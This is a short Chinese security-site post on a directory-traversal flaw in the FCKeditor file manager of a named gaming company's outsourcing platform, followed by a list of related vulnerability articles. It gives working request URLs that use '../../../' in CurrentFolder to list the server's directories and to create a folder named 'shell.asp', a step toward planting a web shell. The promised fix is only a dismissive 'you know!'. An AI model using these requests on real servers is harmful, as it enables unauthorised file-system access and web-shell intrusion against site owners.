手机
当前位置:查字典教程网 >网络安全 >漏洞分析 >盛大游戏外包管理平台FCK列全盘目路分析与解决方案
盛大游戏外包管理平台FCK列全盘目路分析与解决方案
摘要:修改CurrentFolder参数使用../../来进入不同的目录/browser/default/connectors/aspx/conn...

修改CurrentFolder 参数使用../../来进入不同的目录

/browser/default/connectors/aspx/connector.aspx?Command=CreateFolder&Type=Image&CurrentFolder=../../../&NewFolderName=shell.asp

根据返回的XML 信息可以查看网站所有的目录。

FCKeditor/editor/filemanager/browser/default/connectors/aspx/connector.aspx?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=/

也可以直接浏览盘符:

盛大游戏外包管理平台FCK列全盘目路分析与解决方案1

盛大游戏外包管理平台FCK列全盘目路分析与解决方案2

修复方案:

你懂的!

【盛大游戏外包管理平台FCK列全盘目路分析与解决方案】相关文章:

php escapeshellcmd多字节编码漏洞解析及延伸

BusinessObjects RptViewerAX ActiveX栈溢出漏洞

优酷资源管理系统V1.0的设计缺陷的分析与解决方案

Adobe Photoshop Album Starter Edition BMP图形头处理缓冲区溢出漏洞

Ewebeditor2.8.0最终版删除任意文件漏洞分析与解决方法

BBSXP论坛程序New.asp页面过滤不严导致SQL注入漏洞

豆包网的搜索型盲注漏洞与分析及修复方案(图)

PHP-Nuke 4nChat错误验证roomid参数 SQL注入漏洞

Mambo index.php文件多个跨站脚本执行漏洞

PunBB口令重置弱随机数绕过安全限制漏洞

精品推荐
分类导航